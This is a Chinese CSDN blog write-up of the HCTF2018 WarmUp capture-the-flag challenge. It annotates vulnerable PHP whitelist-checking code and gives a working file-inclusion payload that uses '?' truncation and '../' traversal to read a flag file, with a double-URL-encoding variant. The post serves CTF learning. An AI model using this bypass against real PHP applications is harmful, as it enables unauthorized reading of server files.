[buu - web]HCTF2018 WarmUp

最新推荐文章于 2022-05-28 21:11:19 发布
最新推荐文章于 2022-05-28 21:11:19 发布
阅读量250 收藏 2
点赞数 1
分类专栏: CTF-web 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53146913/article/details/123217895
版权
这篇博客探讨了PHP中的安全过滤代码,主要关注`emmm`类的`checkFile`方法,该方法用于检查并限制文件包含操作。通过分析`whitelist`白名单、字符串处理函数以及条件判断,揭示了防止非法文件访问的机制。同时,文章提供了一个可能的payload构造方法来尝试绕过过滤,展示了文件包含漏洞的概念。
摘要由CSDN通过智能技术生成

HCTF2018 WarmUp

 <?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        //传入了变量page,也就是我们刚刚传进来的file
        {    //这里定义了白名单
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {//这里和外层的判断file 一致基本是再次判断了一遍
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }
            //这里经过判断,$page的值不在白名单里,所以进入下一个if。            

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            /*截取传入数据第一个“?”前的数据,如果没有“?”就传入整个page数据。 
            mb_strpos()返回要查找的字符串在别一个字符串中首次出现的位置,  
            mb_strpos($page . '?', '?')的意思是截取传入参数中两个问号之间的值
            */
            

            if (in_array($_page, $whitelist)) { 
                return true;
            }

            $_page = urldecode($page);//对传入的page进行url编码
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

//上面都是对emmm的定义,下面才是正式的过滤代码。

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])    )    //这里·checkfile是对上面函数的调用
    {
        include $_REQUEST['file'];
        exit;
    } 
    else 
    {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

0x01 首先:发现$whitelist数组中有两个值为source.php和hint.php

whitelist:白名单

in_array(search,array,type) 函数搜索数组中是否存在指定的值

0x02 //这里要求page必须有值,而且&page必须是字符串。

 if (! isset($page) || !is_string($page))

0x03 

mb_strpos($page . '?', '?')

 

这个函数返回的是 “$page?” 中 '?' 第一次出现的位置。

0x04 mub_str(page,0,mb_strpos($page.'?','?'))

所以这个函数这里返回的page值,就是?前的内容。

0x05  判断条件

if (! empty($_REQUEST['file']) //变量不为空
        && is_string($_REQUEST['file']) //要求请求为字符串
        && emmm::checkFile($_REQUEST['file']) //将值赋予checkfile函数

0x06 文件包含

include $_REQUEST['file'];
  1. REQUEST['file']不为空。
  2. REQUEST['file'] 是字符串。
  3. checkfile()函数返回true。

所以说,我们这里可以直接构造出payload(这里由于我们不知道ffffllllaaaagggg在哪个路径下,所以只能依次加上…/直至得出flag)

source.php?file=source.php?../../../../../ffffllllaaaagggg

即可得出FLAG(或者将source.php后面的’?'url加密俩次也可)

菜菜zhao
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HCTF2018-web-warmup
baola的博客
08-04 711
HCTF2018-web-warmup 这题是根据CVE-2018-12613 phpMyAdmin文件包含漏洞改编而来。 所以需要有文件包含漏洞的基础知识,php代码基础
Buuctf-Web-[HCTF 2018]WarmUp
御七彩虹猫
05-12 584
Buuctf-Web-[HCTF 2018]WarmUp
BUUCTF WEB [HCTF 2018]WarmUp
moyikong的博客
01-06 155
打开连接后,发现就只有一张图,所以反手就是一个f12。在源代码里面看到了souce.php 所以下一步就是访问source.php 再看一下hint.php 所以根据源代码构造payload:/source.php?file=hint.php?/…/…/…/…/ffffllllaaaagggg 然后得到flag ...
[HCTF 2018]WarmUp
m0_62709637的博客
05-28 6496
这个题的前身是一个cve漏洞(phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)) 刚入坑的小伙伴不要慌,我们一步一步慢慢来看 点开题目,日常f12发现有提示,所以我们进行访问 发现是源代码,让我们进行阅读(分为两块1、主函数部分 2、外部类) 外部方法: 这里对两个函数进行解释查询以下资料 (关于mb_strpos函数在测试时发现如果没有匹配到指定符号,将返回字符串长度) 我们进行一些本地测试加深理解: 代码如下: c.
php代码审计题目总结
qq_45927819的博客
12-14 1696
<?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_string($page))//判断.
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
在本题目中,我们面临的是一个关于WebAssembly(简称WASM)逆向分析的挑战,源自FlareOn5赛事的Web2.0关卡。WebAssembly是一种低级虚拟机指令集,它允许开发者以接近原生的速度运行用C、C++或Rust等语言编译的代码。...
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
【变量覆盖漏洞详解】 ...这类漏洞通常出现在以下几种情况: 1. **全局变量覆盖**: ...攻击者可以通过操纵这些请求参数来覆盖预定义的变量,造成安全风险。... ...2. **extract()函数使用不当**: `extract()`函数会从数组中...
joinUs-buu2018:h5邀请函、招商加盟、boudle整屏滚动 + animation 动画库 + 音乐播放与暂停 + 申请加盟数据提交 + 微信qq分享
05-02
joinUs-buu2018 h5邀请函、招商加盟、boudle整屏滚动 + animation 动画库 + 音乐播放与暂停 + 申请加盟数据提交 + 微信/qq分享 #预览地址
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
ctf php代码审计 绕过,CTF代码审计之[HCTF 2018]WarmUp
weixin_32019577的博客
04-11 641
[HCTF 2018]WarmUp{public static function checkFile(&$page){$whitelist = ["source"=>"source.php","hint"=>"hint.php"];if (! isset($page) || !is_string($page)) {echo "you can't see it";return f...
WEB_HCTF_2018_WarmUp
Pz_mstr's Blog
03-06 680
Categories web-代码审计 write up source code get source code http://eb22847d-9f8a-4ecf-b972-5ecebfcf5faf.node3.buuoj.cn/source.php <?php highlight_file(__FILE__); class emmm { publi...
【XCTF高手进阶区】 web7_warmup writeup(一)
Mitchell_Donovan的博客
02-14 419
web7_warmup 原题链接 key:php代码审计 ①环境打开后页面显示一个滑稽???? 查看源代码后发现线索source.php???? ②在地址栏后加上/source.php访问,获得一段php代码 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) {
文件包含、文件上传漏洞
CyhDl666的博客
01-28 1662
文章目录文件包含漏洞1.[HCTF 2018]WarmUp2.[ACTF2020 新生赛]Include3.[极客大挑战 2019]Secret File4.[BJDCTF2020]ZJCTF 不过如此 文件包含漏洞 不多说了 直接做题 1.[HCTF 2018]WarmUp F12进入source.php文件 <?php highlight_file(__FILE__); class emmm { public static function che
buu web:warm up(PHP代码审计)
m0_55378150的博客
03-28 2632
启动靶机,发现了这么个玩意 查看一手源代码 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edg
BUUCTF[HCTF 2018]WarmUp
weixin_53955759的博客
09-02 296
打开题目发现一张滑稽的图片???? 查看源码以后发现源码中有一个访问地址source.php 访问以后得到了源码 发现了文件包含的特点 highlight_file(__FILE__) <?php highlight_file(__FILE__); classemmm { publicstaticfunctioncheckFile(&$page) { $whitelist=["source"=&...
中文字符部分用*号代替
dengwu4129的博客
09-12 457
前端展示字段需要有部分被遮挡,特此学习了下php的mb_substr()函数 mb_substr ( string $str , int $start [, int $length = NULL [, string $encoding = mb_internal_encoding() ]] ) : string 参数描述 str 必需。从该 string 中...
2018.11.10HCTF warmup
include_heqile的博客
11-13 805
这道题其实是一道签到题,我们查看题目源代码,会发现提示我们查看source.php,然后我们审查源代码: &lt;?php class emmm { public static function checkFile(&amp;$page) { $whitelist = ["source"=&gt;"source.php","h...
php代码审计
qq_44832048的博客
10-28 577
highlight_file(__FILE__); //打印代码 class emmm //定义emmm类 { public static function checkFile(&$page)//将传入的参数赋给$page { $whitelist = ["source"=>"source.php","hint"=>"hint.php"];//声明$whitelist(白名单)数组 ...
buu ctf web进阶]ssti
08-23
buu ctf web进阶中,ssti代表 Side Template Injection,是一种应用程序中的安全漏洞。通过此漏洞,攻击者可以注入恶意代码到服务器端的模板引擎,从而执行任意代码或获取敏感信息。这种漏洞可能导致服务器被入侵,用户数据泄露等安全问题。在比赛中,参赛者需要学习ssti的原理和常见的攻击方法,并利用它来获取目标系统的flag。在比赛中,常见的ctf题目会提供一些模板注入的挑战,参赛者需要在给定的条件下,构造合适的payload来实现攻击目标。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [(wp)ctfweb-buu中ssti模板注入](https://blog.csdn.net/qq_51862722/article/details/118685275)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值